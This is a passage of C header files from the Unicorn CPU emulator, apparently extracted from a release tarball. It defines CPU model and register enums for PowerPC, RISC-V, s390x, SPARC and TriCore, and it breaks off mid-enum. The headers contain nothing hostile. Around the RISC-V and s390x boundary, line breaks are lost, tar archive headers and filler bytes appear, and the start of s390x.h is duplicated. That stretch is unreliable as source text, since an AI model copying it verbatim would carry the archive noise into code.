    UC_PPC_REG_FPR12, UC_PPC_REG_FPR13, UC_PPC_REG_FPR14, UC_PPC_REG_FPR15,
    UC_PPC_REG_FPR16, UC_PPC_REG_FPR17, UC_PPC_REG_FPR18, UC_PPC_REG_FPR19,
    UC_PPC_REG_FPR20, UC_PPC_REG_FPR21, UC_PPC_REG_FPR22, UC_PPC_REG_FPR23,
    UC_PPC_REG_FPR24, UC_PPC_REG_FPR25, UC_PPC_REG_FPR26, UC_PPC_REG_FPR27,
    UC_PPC_REG_FPR28, UC_PPC_REG_FPR29, UC_PPC_REG_FPR30, UC_PPC_REG_FPR31,
    UC_PPC_REG_LR, UC_PPC_REG_XER, UC_PPC_REG_CTR, UC_PPC_REG_MSR,
    UC_PPC_REG_FPSCR, UC_PPC_REG_CR,

    UC_PPC_REG_ENDING, // <-- mark the end of the list of registers
} uc_ppc_reg;

#ifdef __cplusplus
}
#endif

#endif
unicorn-2.1.1/include/unicorn/riscv.h

/* Unicorn Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2020 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

#ifndef UNICORN_RISCV_H
#define UNICORN_RISCV_H

#ifdef __cplusplus
extern "C" {
#endif

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> RISCV32 CPU
typedef enum uc_cpu_riscv32 {
    UC_CPU_RISCV32_ANY = 0,
    UC_CPU_RISCV32_BASE32,
    UC_CPU_RISCV32_SIFIVE_E31,
    UC_CPU_RISCV32_SIFIVE_U34,
    UC_CPU_RISCV32_ENDING
} uc_cpu_riscv32;

//> RISCV64 CPU
typedef enum uc_cpu_riscv64 {
    UC_CPU_RISCV64_ANY = 0,
    UC_CPU_RISCV64_BASE64,
    UC_CPU_RISCV64_SIFIVE_E51,
    UC_CPU_RISCV64_SIFIVE_U54,
    UC_CPU_RISCV64_ENDING
} uc_cpu_riscv64;

//> RISCV registers
typedef enum uc_riscv_reg {
    UC_RISCV_REG_INVALID = 0,

    //> General purpose registers
    UC_RISCV_REG_X0, UC_RISCV_REG_X1, UC_RISCV_REG_X2, UC_RISCV_REG_X3,
    UC_RISCV_REG_X4, UC_RISCV_REG_X5, UC_RISCV_REG_X6, UC_RISCV_REG_X7,
    UC_RISCV_REG_X8, UC_RISCV_REG_X9, UC_RISCV_REG_X10, UC_RISCV_REG_X11,
    UC_RISCV_REG_X12, UC_RISCV_REG_X13, UC_RISCV_REG_X14, UC_RISCV_REG_X15,
    UC_RISCV_REG_X16, UC_RISCV_REG_X17, UC_RISCV_REG_X18, UC_RISCV_REG_X19,
    UC_RISCV_REG_X20, UC_RISCV_REG_X21, UC_RISCV_REG_X22, UC_RISCV_REG_X23,
    UC_RISCV_REG_X24, UC_RISCV_REG_X25, UC_RISCV_REG_X26, UC_RISCV_REG_X27,
    UC_RISCV_REG_X28, UC_RISCV_REG_X29, UC_RISCV_REG_X30, UC_RISCV_REG_X31,

    //> RISCV CSR
    UC_RISCV_REG_USTATUS, UC_RISCV_REG_UIE, UC_RISCV_REG_UTVEC,
    UC_RISCV_REG_USCRATCH, UC_RISCV_REG_UEPC, UC_RISCV_REG_UCAUSE,
    UC_RISCV_REG_UTVAL, UC_RISCV_REG_UIP,
    UC_RISCV_REG_FFLAGS, UC_RISCV_REG_FRM, UC_RISCV_REG_FCSR,
    UC_RISCV_REG_CYCLE, UC_RISCV_REG_TIME, UC_RISCV_REG_INSTRET,
    UC_RISCV_REG_HPMCOUNTER3, UC_RISCV_REG_HPMCOUNTER4,
    UC_RISCV_REG_HPMCOUNTER5, UC_RISCV_REG_HPMCOUNTER6,
    UC_RISCV_REG_HPMCOUNTER7, UC_RISCV_REG_HPMCOUNTER8,
    UC_RISCV_REG_HPMCOUNTER9, UC_RISCV_REG_HPMCOUNTER10,
    UC_RISCV_REG_HPMCOUNTER11, UC_RISCV_REG_HPMCOUNTER12,
    UC_RISCV_REG_HPMCOUNTER13, UC_RISCV_REG_HPMCOUNTER14,
    UC_RISCV_REG_HPMCOUNTER15, UC_RISCV_REG_HPMCOUNTER16,
    UC_RISCV_REG_HPMCOUNTER17, UC_RISCV_REG_HPMCOUNTER18,
    UC_RISCV_REG_HPMCOUNTER19, UC_RISCV_REG_HPMCOUNTER20,
    UC_RISCV_REG_HPMCOUNTER21, UC_RISCV_REG_HPMCOUNTER22,
    UC_RISCV_REG_HPMCOUNTER23, UC_RISCV_REG_HPMCOUNTER24,
    UC_RISCV_REG_HPMCOUNTER25, UC_RISCV_REG_HPMCOUNTER26,
    UC_RISCV_REG_HPMCOUNTER27, UC_RISCV_REG_HPMCOUNTER28,
    UC_RISCV_REG_HPMCOUNTER29, UC_RISCV_REG_HPMCOUNTER30,
    UC_RISCV_REG_HPMCOUNTER31,
    UC_RISCV_REG_CYCLEH, UC_RISCV_REG_TIMEH, UC_RISCV_REG_INSTRETH,
    UC_RISCV_REG_HPMCOUNTER3H, UC_RISCV_REG_HPMCOUNTER4H,
UC_RISCV_REG_HPMCOUNTER5H, UC_RISCV_REG_HPMCOUNTER6H, UC_RISCV_REG_HPMCOUNTER7H, UC_RISCV_REG_HPMCOUNTER8H, UC_RISCV_REG_HPMCOUNTER9H, UC_RISCV_REG_HPMCOUNTER10H, UC_RISCV_REG_HPMCOUNTER11H, UC_RISCV_REG_HPMCOUNTER12H, UC_RISCV_REG_HPMCOUNTER13H, UC_RISCV_REG_HPMCOUNTER14H, UC_RISCV_REG_HPMCOUNTER15H, UC_RISCV_REG_HPMCOUNTER16H, UC_RISCV_REG_HPMCOUNTER17H, UC_RISCV_REG_HPMCOUNTER18H, UC_RISCV_REG_HPMCOUNTER19H, UC_RISCV_REG_HPMCOUNTER20H, UC_RISCV_REG_HPMCOUNTER21H, UC_RISCV_REG_HPMCOUNTER22H, UC_RISCV_REG_HPMCOUNTER23H, UC_RISCV_REG_HPMCOUNTER24H, UC_RISCV_REG_HPMCOUNTER25H, UC_RISCV_REG_HPMCOUNTER26H, UC_RISCV_REG_HPMCOUNTER27H, UC_RISCV_REG_HPMCOUNTER28H, UC_RISCV_REG_HPMCOUNTER29H, UC_RISCV_REG_HPMCOUNTER30H, UC_RISCV_REG_HPMCOUNTER31H, UC_RISCV_REG_MCYCLE, UC_RISCV_REG_MINSTRET, UC_RISCV_REG_MCYCLEH, UC_RISCV_REG_MINSTRETH, UC_RISCV_REG_MVENDORID, UC_RISCV_REG_MARCHID, UC_RISCV_REG_MIMPID, UC_RISCV_REG_MHARTID, UC_RISCV_REG_MSTATUS, UC_RISCV_REG_MISA, UC_RISCV_REG_MEDELEG, UC_RISCV_REG_MIDELEG, UC_RISCV_REG_MIE, UC_RISCV_REG_MTVEC, UC_RISCV_REG_MCOUNTEREN, UC_RISCV_REG_MSTATUSH, UC_RISCV_REG_MUCOUNTEREN, UC_RISCV_REG_MSCOUNTEREN, UC_RISCV_REG_MHCOUNTEREN, UC_RISCV_REG_MSCRATCH, UC_RISCV_REG_MEPC, UC_RISCV_REG_MCAUSE, UC_RISCV_REG_MTVAL, UC_RISCV_REG_MIP, UC_RISCV_REG_MBADADDR, UC_RISCV_REG_SSTATUS, UC_RISCV_REG_SEDELEG, UC_RISCV_REG_SIDELEG, UC_RISCV_REG_SIE, UC_RISCV_REG_STVEC, UC_RISCV_REG_SCOUNTEREN, UC_RISCV_REG_SSCRATCH, UC_RISCV_REG_SEPC, UC_RISCV_REG_SCAUSE, UC_RISCV_REG_STVAL, UC_RISCV_REG_SIP, UC_RISCV_REG_SBADADDR, UC_RISCV_REG_SPTBR, UC_RISCV_REG_SATP, UC_RISCV_REG_HSTATUS, UC_RISCV_REG_HEDELEG, UC_RISCV_REG_HIDELEG, UC_RISCV_REG_HIE, UC_RISCV_REG_HCOUNTEREN, UC_RISCV_REG_HTVAL, UC_RISCV_REG_HIP, UC_RISCV_REG_HTINST, UC_RISCV_REG_HGATP, UC_RISCV_REG_HTIMEDELTA, UC_RISCV_REG_HTIMEDELTAH, //> Floating-point registers UC_RISCV_REG_F0, // "ft0" UC_RISCV_REG_F1, // "ft1" UC_RISCV_REG_F2, // "ft2" UC_RISCV_REG_F3, // "ft3" UC_RISCV_REG_F4, // "ft4" UC_RISCV_REG_F5, // "ft5" UC_RISCV_REG_F6, // "ft6" UC_RISCV_REG_F7, // "ft7" UC_RISCV_REG_F8, // "fs0" UC_RISCV_REG_F9, // "fs1" UC_RISCV_REG_F10, // "fa0" UC_RISCV_REG_F11, // "fa1" UC_RISCV_REG_F12, // "fa2" UC_RISCV_REG_F13, // "fa3" UC_RISCV_REG_F14, // "fa4" UC_RISCV_REG_F15, // "fa5" UC_RISCV_REG_F16, // "fa6" UC_RISCV_REG_F17, // "fa7" UC_RISCV_REG_F18, // "fs2" UC_RISCV_REG_F19, // "fs3" UC_RISCV_REG_F20, // "fs4" UC_RISCV_REG_F21, // "fs5" UC_RISCV_REG_F22, // "fs6" UC_RISCV_REG_F23, // "fs7" UC_RISCV_REG_F24, // "fs8" UC_RISCV_REG_F25, // "fs9" UC_RISCV_REG_F26, // "fs10" UC_RISCV_REG_F27, // "fs11" UC_RISCV_REG_F28, // "ft8" UC_RISCV_REG_F29, // "ft9" UC_RISCV_REG_F30, // "ft10" UC_RISCV_REG_F31, // "ft11" UC_RISCV_REG_PC, // PC register UC_RISCV_REG_ENDING, // <-- mark the end of the list or registers //> Alias registers UC_RISCV_REG_ZERO = UC_RISCV_REG_X0, // "zero" UC_RISCV_REG_RA = UC_RISCV_REG_X1, // "ra" UC_RISCV_REG_SP = UC_RISCV_REG_X2, // "sp" UC_RISCV_REG_GP = UC_RISCV_REG_X3, // "gp" UC_RISCV_REG_TP = UC_RISCV_REG_X4, // "tp" UC_RISCV_REG_T0 = UC_RISCV_REG_X5, // "t0" UC_RISCV_REG_T1 = UC_RISCV_REG_X6, // "t1" UC_RISCV_REG_T2 = UC_RISCV_REG_X7, // "t2" UC_RISCV_REG_S0 = UC_RISCV_REG_X8, // "s0" UC_RISCV_REG_FP = UC_RISCV_REG_X8, // "fp" UC_RISCV_REG_S1 = UC_RISCV_REG_X9, // "s1" UC_RISCV_REG_A0 = UC_RISCV_REG_X10, // "a0" UC_RISCV_REG_A1 = UC_RISCV_REG_X11, // "a1" UC_RISCV_REG_A2 = UC_RISCV_REG_X12, // "a2" UC_RISCV_REG_A3 = UC_RISCV_REG_X13, // "a3" UC_RISCV_REG_A4 = UC_RISCV_REG_X14, // "a4" UC_RISCV_REG_A5 = 
UC_RISCV_REG_X15, // "a5" UC_RISCV_REG_A6 = UC_RISCV_REG_X16, // "a6" UC_RISCV_REG_A7 = UC_RISCV_REG_X17, // "a7" UC_RISCV_REG_S2 = UC_RISCV_REG_X18, // "s2" UC_RISCV_REG_S3 = UC_RISCV_REG_X19, // "s3" UC_RISCV_REG_S4 = UC_RISCV_REG_X20, // "s4" UC_RISCV_REG_S5 = UC_RISCV_REG_X21, // "s5" UC_RISCV_REG_S6 = UC_RISCV_REG_X22, // "s6" UC_RISCV_REG_S7 = UC_RISCV_REG_X23, // "s7" UC_RISCV_REG_S8 = UC_RISCV_REG_X24, // "s8" UC_RISCV_REG_S9 = UC_RISCV_REG_X25, // "s9" UC_RISCV_REG_S10 = UC_RISCV_REG_X26, // "s10" UC_RISCV_REG_S11 = UC_RISCV_REG_X27, // "s11" UC_RISCV_REG_T3 = UC_RISCV_REG_X28, // "t3" UC_RISCV_REG_T4 = UC_RISCV_REG_X29, // "t4" UC_RISCV_REG_T5 = UC_RISCV_REG_X30, // "t5" UC_RISCV_REG_T6 = UC_RISCV_REG_X31, // "t6" UC_RISCV_REG_FT0 = UC_RISCV_REG_F0, // "ft0" UC_RISCV_REG_FT1 = UC_RISCV_REG_F1, // "ft1" UC_RISCV_REG_FT2 = UC_RISCV_REG_F2, // "ft2" UC_RISCV_REG_FT3 = UC_RISCV_REG_F3, // "ft3" UC_RISCV_REG_FT4 = UC_RISCV_REG_F4, // "ft4" UC_RISCV_REG_FT5 = UC_RISCV_REG_F5, // "ft5" UC_RISCV_REG_FT6 = UC_RISCV_REG_F6, // "ft6" UC_RISCV_REG_FT7 = UC_RISCV_REG_F7, // "ft7" UC_RISCV_REG_FS0 = UC_RISCV_REG_F8, // "fs0" UC_RISCV_REG_FS1 = UC_RISCV_REG_F9, // "fs1" UC_RISCV_REG_FA0 = UC_RISCV_REG_F10, // "fa0" UC_RISCV_REG_FA1 = UC_RISCV_REG_F11, // "fa1" UC_RISCV_REG_FA2 = UC_RISCV_REG_F12, // "fa2" UC_RISCV_REG_FA3 = UC_RISCV_REG_F13, // "fa3" UC_RISCV_REG_FA4 = UC_RISCV_REG_F14, // "fa4" UC_RISCV_REG_FA5 = UC_RISCV_REG_F15, // "fa5" UC_RISCV_REG_FA6 = UC_RISCV_REG_F16, // "fa6" UC_RISCV_REG_FA7 = UC_RISCV_REG_F17, // "fa7" UC_RISCV_REG_FS2 = UC_RISCV_REG_F18, // "fs2" UC_RISCV_REG_FS3 = UC_RISCV_REG_F19, // "fs3" UC_RISCV_REG_FS4 = UC_RISCV_REG_F20, // "fs4" UC_RISCV_REG_FS5 = UC_RISCV_REG_F21, // "fs5" UC_RISCV_REG_FS6 = UC_RISCV_REG_F22, // "fs6" UC_RISCV_REG_FS7 = UC_RISCV_REG_F23, // "fs7" UC_RISCV_REG_FS8 = UC_RISCV_REG_F24, // "fs8" UC_RISCV_REG_FS9 = UC_RISCV_REG_F25, // "fs9" UC_RISCV_REG_FS10 = UC_RISCV_REG_F26, // "fs10" UC_RISCV_REG_FS11 = UC_RISCV_REG_F27, // "fs11" UC_RISCV_REG_FT8 = UC_RISCV_REG_F28, // "ft8" UC_RISCV_REG_FT9 = UC_RISCV_REG_F29, // "ft9" UC_RISCV_REG_FT10 = UC_RISCV_REG_F30, // "ft10" UC_RISCV_REG_FT11 = UC_RISCV_REG_F31, // "ft11" } uc_riscv_reg; #ifdef __cplusplus } #endif #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/include/unicorn/s390x.h���������������������������������������������������������������0000664�0000000�0000000�00000005655�14675241067�0017356�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2021 */ #ifndef UNICORN_S390X_H #define UNICORN_S390X_H #ifdef __cplusplus extern "C" { #endif #ifdef _MSC_VER #pragma warning(disable : 4201) #endif //> S390X CPU typedef enum uc_cpu_s390x { UC_CPU_S390X_Z900 = 0, UC_CPU_S390X_Z900_2, UC_CPU_S390X_Z900_3, UC_CPU_S390X_Z800, UC_CPU_S390X_Z990, UC_CPU_S390X_Z990_2, UC_CPU_S390X_Z990_3, UC_CPU_S390X_Z890, UC_CPU_S390X_Z990_4, UC_CPU_S390X_Z890_2, UC_CPU_S390X_Z990_5, UC_CPU_S390X_Z890_3, UC_CPU_S390X_Z9EC, UC_CPU_S390X_Z9EC_2, UC_CPU_S390X_Z9BC, 
unicorn-2.1.1/include/unicorn/s390x.h

/* Unicorn Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2021 */

#ifndef UNICORN_S390X_H
#define UNICORN_S390X_H

#ifdef __cplusplus
extern "C" {
#endif

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> S390X CPU
typedef enum uc_cpu_s390x {
    UC_CPU_S390X_Z900 = 0, UC_CPU_S390X_Z900_2, UC_CPU_S390X_Z900_3,
    UC_CPU_S390X_Z800,
    UC_CPU_S390X_Z990, UC_CPU_S390X_Z990_2, UC_CPU_S390X_Z990_3,
    UC_CPU_S390X_Z890, UC_CPU_S390X_Z990_4, UC_CPU_S390X_Z890_2,
    UC_CPU_S390X_Z990_5, UC_CPU_S390X_Z890_3,
    UC_CPU_S390X_Z9EC, UC_CPU_S390X_Z9EC_2, UC_CPU_S390X_Z9BC,
    UC_CPU_S390X_Z9EC_3, UC_CPU_S390X_Z9BC_2,
    UC_CPU_S390X_Z10EC, UC_CPU_S390X_Z10EC_2, UC_CPU_S390X_Z10BC,
    UC_CPU_S390X_Z10EC_3, UC_CPU_S390X_Z10BC_2,
    UC_CPU_S390X_Z196, UC_CPU_S390X_Z196_2, UC_CPU_S390X_Z114,
    UC_CPU_S390X_ZEC12, UC_CPU_S390X_ZEC12_2, UC_CPU_S390X_ZBC12,
    UC_CPU_S390X_Z13, UC_CPU_S390X_Z13_2, UC_CPU_S390X_Z13S,
    UC_CPU_S390X_Z14, UC_CPU_S390X_Z14_2, UC_CPU_S390X_Z14ZR1,
    UC_CPU_S390X_GEN15A, UC_CPU_S390X_GEN15B,
    UC_CPU_S390X_QEMU,
    UC_CPU_S390X_MAX,
    UC_CPU_S390X_ENDING
} uc_cpu_s390x;

//> S390X registers
typedef enum uc_s390x_reg {
    UC_S390X_REG_INVALID = 0,

    //> General purpose registers
    UC_S390X_REG_R0, UC_S390X_REG_R1, UC_S390X_REG_R2, UC_S390X_REG_R3,
    UC_S390X_REG_R4, UC_S390X_REG_R5, UC_S390X_REG_R6, UC_S390X_REG_R7,
    UC_S390X_REG_R8, UC_S390X_REG_R9, UC_S390X_REG_R10, UC_S390X_REG_R11,
    UC_S390X_REG_R12, UC_S390X_REG_R13, UC_S390X_REG_R14, UC_S390X_REG_R15,

    //> Floating point registers
    UC_S390X_REG_F0, UC_S390X_REG_F1, UC_S390X_REG_F2, UC_S390X_REG_F3,
    UC_S390X_REG_F4, UC_S390X_REG_F5, UC_S390X_REG_F6, UC_S390X_REG_F7,
    UC_S390X_REG_F8, UC_S390X_REG_F9, UC_S390X_REG_F10, UC_S390X_REG_F11,
    UC_S390X_REG_F12, UC_S390X_REG_F13, UC_S390X_REG_F14, UC_S390X_REG_F15,
    UC_S390X_REG_F16, UC_S390X_REG_F17, UC_S390X_REG_F18, UC_S390X_REG_F19,
    UC_S390X_REG_F20, UC_S390X_REG_F21, UC_S390X_REG_F22, UC_S390X_REG_F23,
    UC_S390X_REG_F24, UC_S390X_REG_F25, UC_S390X_REG_F26, UC_S390X_REG_F27,
    UC_S390X_REG_F28, UC_S390X_REG_F29, UC_S390X_REG_F30, UC_S390X_REG_F31,

    //> Access registers
    UC_S390X_REG_A0, UC_S390X_REG_A1, UC_S390X_REG_A2, UC_S390X_REG_A3,
    UC_S390X_REG_A4, UC_S390X_REG_A5, UC_S390X_REG_A6, UC_S390X_REG_A7,
    UC_S390X_REG_A8, UC_S390X_REG_A9, UC_S390X_REG_A10, UC_S390X_REG_A11,
    UC_S390X_REG_A12, UC_S390X_REG_A13, UC_S390X_REG_A14, UC_S390X_REG_A15,

    UC_S390X_REG_PC, // PC register
    UC_S390X_REG_PSWM,

    UC_S390X_REG_ENDING, // <-- mark the end of the list of registers

    //> Alias registers
} uc_s390x_reg;

#ifdef __cplusplus
}
#endif

#endif

unicorn-2.1.1/include/unicorn/sparc.h

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2014-2017 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

#ifndef UNICORN_SPARC_H
#define UNICORN_SPARC_H

#ifdef __cplusplus
extern "C" {
#endif

// GCC SPARC toolchain has a default macro called "sparc" which breaks
// compilation
#undef sparc

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> SPARC32 CPU
typedef enum uc_cpu_sparc32 {
    UC_CPU_SPARC32_FUJITSU_MB86904 = 0,
    UC_CPU_SPARC32_FUJITSU_MB86907,
    UC_CPU_SPARC32_TI_MICROSPARC_I,
    UC_CPU_SPARC32_TI_MICROSPARC_II,
    UC_CPU_SPARC32_TI_MICROSPARC_IIEP,
    UC_CPU_SPARC32_TI_SUPERSPARC_40,
    UC_CPU_SPARC32_TI_SUPERSPARC_50,
    UC_CPU_SPARC32_TI_SUPERSPARC_51,
    UC_CPU_SPARC32_TI_SUPERSPARC_60,
    UC_CPU_SPARC32_TI_SUPERSPARC_61,
    UC_CPU_SPARC32_TI_SUPERSPARC_II,
    UC_CPU_SPARC32_LEON2,
    UC_CPU_SPARC32_LEON3,
    UC_CPU_SPARC32_ENDING
} uc_cpu_sparc32;

//> SPARC64 CPU
typedef enum uc_cpu_sparc64 {
    UC_CPU_SPARC64_FUJITSU = 0,
    UC_CPU_SPARC64_FUJITSU_III,
    UC_CPU_SPARC64_FUJITSU_IV,
    UC_CPU_SPARC64_FUJITSU_V,
    UC_CPU_SPARC64_TI_ULTRASPARC_I,
    UC_CPU_SPARC64_TI_ULTRASPARC_II,
    UC_CPU_SPARC64_TI_ULTRASPARC_III,
    UC_CPU_SPARC64_TI_ULTRASPARC_IIE,
    UC_CPU_SPARC64_SUN_ULTRASPARC_III,
    UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU,
    UC_CPU_SPARC64_SUN_ULTRASPARC_IIII,
    UC_CPU_SPARC64_SUN_ULTRASPARC_IV,
    UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS,
    UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS,
    UC_CPU_SPARC64_SUN_ULTRASPARC_T1,
    UC_CPU_SPARC64_SUN_ULTRASPARC_T2,
    UC_CPU_SPARC64_NEC_ULTRASPARC_I,
    UC_CPU_SPARC64_ENDING
} uc_cpu_sparc64;

//> SPARC registers
typedef enum uc_sparc_reg {
    UC_SPARC_REG_INVALID = 0,

    UC_SPARC_REG_F0, UC_SPARC_REG_F1, UC_SPARC_REG_F2, UC_SPARC_REG_F3,
    UC_SPARC_REG_F4, UC_SPARC_REG_F5, UC_SPARC_REG_F6, UC_SPARC_REG_F7,
    UC_SPARC_REG_F8, UC_SPARC_REG_F9, UC_SPARC_REG_F10, UC_SPARC_REG_F11,
    UC_SPARC_REG_F12, UC_SPARC_REG_F13, UC_SPARC_REG_F14, UC_SPARC_REG_F15,
    UC_SPARC_REG_F16, UC_SPARC_REG_F17, UC_SPARC_REG_F18, UC_SPARC_REG_F19,
    UC_SPARC_REG_F20, UC_SPARC_REG_F21, UC_SPARC_REG_F22, UC_SPARC_REG_F23,
    UC_SPARC_REG_F24, UC_SPARC_REG_F25, UC_SPARC_REG_F26, UC_SPARC_REG_F27,
    UC_SPARC_REG_F28, UC_SPARC_REG_F29, UC_SPARC_REG_F30, UC_SPARC_REG_F31,
    UC_SPARC_REG_F32, UC_SPARC_REG_F34, UC_SPARC_REG_F36, UC_SPARC_REG_F38,
    UC_SPARC_REG_F40, UC_SPARC_REG_F42, UC_SPARC_REG_F44, UC_SPARC_REG_F46,
    UC_SPARC_REG_F48, UC_SPARC_REG_F50, UC_SPARC_REG_F52, UC_SPARC_REG_F54,
    UC_SPARC_REG_F56, UC_SPARC_REG_F58, UC_SPARC_REG_F60, UC_SPARC_REG_F62,
    UC_SPARC_REG_FCC0, // Floating condition codes
    UC_SPARC_REG_FCC1, UC_SPARC_REG_FCC2, UC_SPARC_REG_FCC3,
    UC_SPARC_REG_G0, UC_SPARC_REG_G1, UC_SPARC_REG_G2, UC_SPARC_REG_G3,
    UC_SPARC_REG_G4, UC_SPARC_REG_G5, UC_SPARC_REG_G6, UC_SPARC_REG_G7,
    UC_SPARC_REG_I0, UC_SPARC_REG_I1, UC_SPARC_REG_I2, UC_SPARC_REG_I3,
    UC_SPARC_REG_I4, UC_SPARC_REG_I5,
    UC_SPARC_REG_FP,
    UC_SPARC_REG_I7,
    UC_SPARC_REG_ICC, // Integer condition codes
    UC_SPARC_REG_L0, UC_SPARC_REG_L1, UC_SPARC_REG_L2, UC_SPARC_REG_L3,
    UC_SPARC_REG_L4, UC_SPARC_REG_L5, UC_SPARC_REG_L6, UC_SPARC_REG_L7,
    UC_SPARC_REG_O0, UC_SPARC_REG_O1, UC_SPARC_REG_O2, UC_SPARC_REG_O3,
    UC_SPARC_REG_O4, UC_SPARC_REG_O5,
    UC_SPARC_REG_SP,
    UC_SPARC_REG_O7,
    UC_SPARC_REG_Y,   // special register
    UC_SPARC_REG_XCC, // pseudo register
    UC_SPARC_REG_PC,  // program counter register

    UC_SPARC_REG_ENDING, // <-- mark the end of the list of registers

    // extras
    UC_SPARC_REG_O6 = UC_SPARC_REG_SP,
    UC_SPARC_REG_I6 = UC_SPARC_REG_FP,
} uc_sparc_reg;

#ifdef __cplusplus
}
#endif

#endif
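/* Illustrative sketch (not part of this header): SPARC is big-endian, so the
   mode flag is combined accordingly when opening an engine, as in Unicorn's
   samples:

       uc_engine *uc;
       uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32 | UC_MODE_BIG_ENDIAN, &uc);
*/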
unicorn-2.1.1/include/unicorn/tricore.h

/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

/*
   Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022
   Copyright 2022 Aptiv
*/

#ifndef UNICORN_TRICORE_H
#define UNICORN_TRICORE_H

#ifdef __cplusplus
extern "C" {
#endif

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> TRICORE CPU
typedef enum uc_cpu_tricore {
    UC_CPU_TRICORE_TC1796,
    UC_CPU_TRICORE_TC1797,
    UC_CPU_TRICORE_TC27X,
    UC_CPU_TRICORE_ENDING
} uc_cpu_tricore;

//> TRICORE registers
typedef enum uc_tricore_reg {
    UC_TRICORE_REG_INVALID = 0,

    // General purpose registers (GPR)
    // Address GPR
    UC_TRICORE_REG_A0, UC_TRICORE_REG_A1, UC_TRICORE_REG_A2,
    UC_TRICORE_REG_A3, UC_TRICORE_REG_A4, UC_TRICORE_REG_A5,
    UC_TRICORE_REG_A6, UC_TRICORE_REG_A7, UC_TRICORE_REG_A8,
    UC_TRICORE_REG_A9, UC_TRICORE_REG_A10, UC_TRICORE_REG_A11,
    UC_TRICORE_REG_A12, UC_TRICORE_REG_A13, UC_TRICORE_REG_A14,
    UC_TRICORE_REG_A15,
    // Data GPR
    UC_TRICORE_REG_D0, UC_TRICORE_REG_D1, UC_TRICORE_REG_D2,
    UC_TRICORE_REG_D3, UC_TRICORE_REG_D4, UC_TRICORE_REG_D5,
    UC_TRICORE_REG_D6, UC_TRICORE_REG_D7, UC_TRICORE_REG_D8,
    UC_TRICORE_REG_D9, UC_TRICORE_REG_D10, UC_TRICORE_REG_D11,
    UC_TRICORE_REG_D12, UC_TRICORE_REG_D13, UC_TRICORE_REG_D14,
    UC_TRICORE_REG_D15,

    /* CSFR Register */
    UC_TRICORE_REG_PCXI,
    UC_TRICORE_REG_PSW,

    /* PSW flag cache for faster execution */
    UC_TRICORE_REG_PSW_USB_C,
    UC_TRICORE_REG_PSW_USB_V,
    UC_TRICORE_REG_PSW_USB_SV,
    UC_TRICORE_REG_PSW_USB_AV,
    UC_TRICORE_REG_PSW_USB_SAV,

    UC_TRICORE_REG_PC,
    UC_TRICORE_REG_SYSCON,
    UC_TRICORE_REG_CPU_ID,
    UC_TRICORE_REG_BIV,
    UC_TRICORE_REG_BTV,
    UC_TRICORE_REG_ISP,
    UC_TRICORE_REG_ICR,
    UC_TRICORE_REG_FCX,
    UC_TRICORE_REG_LCX,
    UC_TRICORE_REG_COMPAT,

    UC_TRICORE_REG_DPR0_U, UC_TRICORE_REG_DPR1_U, UC_TRICORE_REG_DPR2_U,
    UC_TRICORE_REG_DPR3_U,
    UC_TRICORE_REG_DPR0_L, UC_TRICORE_REG_DPR1_L, UC_TRICORE_REG_DPR2_L,
    UC_TRICORE_REG_DPR3_L,
    UC_TRICORE_REG_CPR0_U, UC_TRICORE_REG_CPR1_U, UC_TRICORE_REG_CPR2_U,
    UC_TRICORE_REG_CPR3_U,
    UC_TRICORE_REG_CPR0_L, UC_TRICORE_REG_CPR1_L, UC_TRICORE_REG_CPR2_L,
    UC_TRICORE_REG_CPR3_L,
    UC_TRICORE_REG_DPM0, UC_TRICORE_REG_DPM1, UC_TRICORE_REG_DPM2,
    UC_TRICORE_REG_DPM3,
    UC_TRICORE_REG_CPM0, UC_TRICORE_REG_CPM1, UC_TRICORE_REG_CPM2,
    UC_TRICORE_REG_CPM3,

    /* Memory Management Registers */
    UC_TRICORE_REG_MMU_CON,
    UC_TRICORE_REG_MMU_ASI,
    UC_TRICORE_REG_MMU_TVA,
    UC_TRICORE_REG_MMU_TPA,
    UC_TRICORE_REG_MMU_TPX,
    UC_TRICORE_REG_MMU_TFA,

    // 1.3.1 Only
    UC_TRICORE_REG_BMACON,
    UC_TRICORE_REG_SMACON,
    UC_TRICORE_REG_DIEAR,
    UC_TRICORE_REG_DIETR,
    UC_TRICORE_REG_CCDIER,
    UC_TRICORE_REG_MIECON,
    UC_TRICORE_REG_PIEAR,
    UC_TRICORE_REG_PIETR,
    UC_TRICORE_REG_CCPIER,

    /* Debug Registers */
    UC_TRICORE_REG_DBGSR,
    UC_TRICORE_REG_EXEVT,
    UC_TRICORE_REG_CREVT,
    UC_TRICORE_REG_SWEVT,
    UC_TRICORE_REG_TR0EVT,
    UC_TRICORE_REG_TR1EVT,
    UC_TRICORE_REG_DMS,
    UC_TRICORE_REG_DCX,
    UC_TRICORE_REG_DBGTCR,
    UC_TRICORE_REG_CCTRL,
    UC_TRICORE_REG_CCNT,
    UC_TRICORE_REG_ICNT,
    UC_TRICORE_REG_M1CNT,
    UC_TRICORE_REG_M2CNT,
    UC_TRICORE_REG_M3CNT,

    UC_TRICORE_REG_ENDING, // <-- mark the end of the list of registers

    // alias registers
    UC_TRICORE_REG_GA0 = UC_TRICORE_REG_A0,
    UC_TRICORE_REG_GA1 = UC_TRICORE_REG_A1,
    UC_TRICORE_REG_GA8 = UC_TRICORE_REG_A8,
    UC_TRICORE_REG_GA9 = UC_TRICORE_REG_A9,
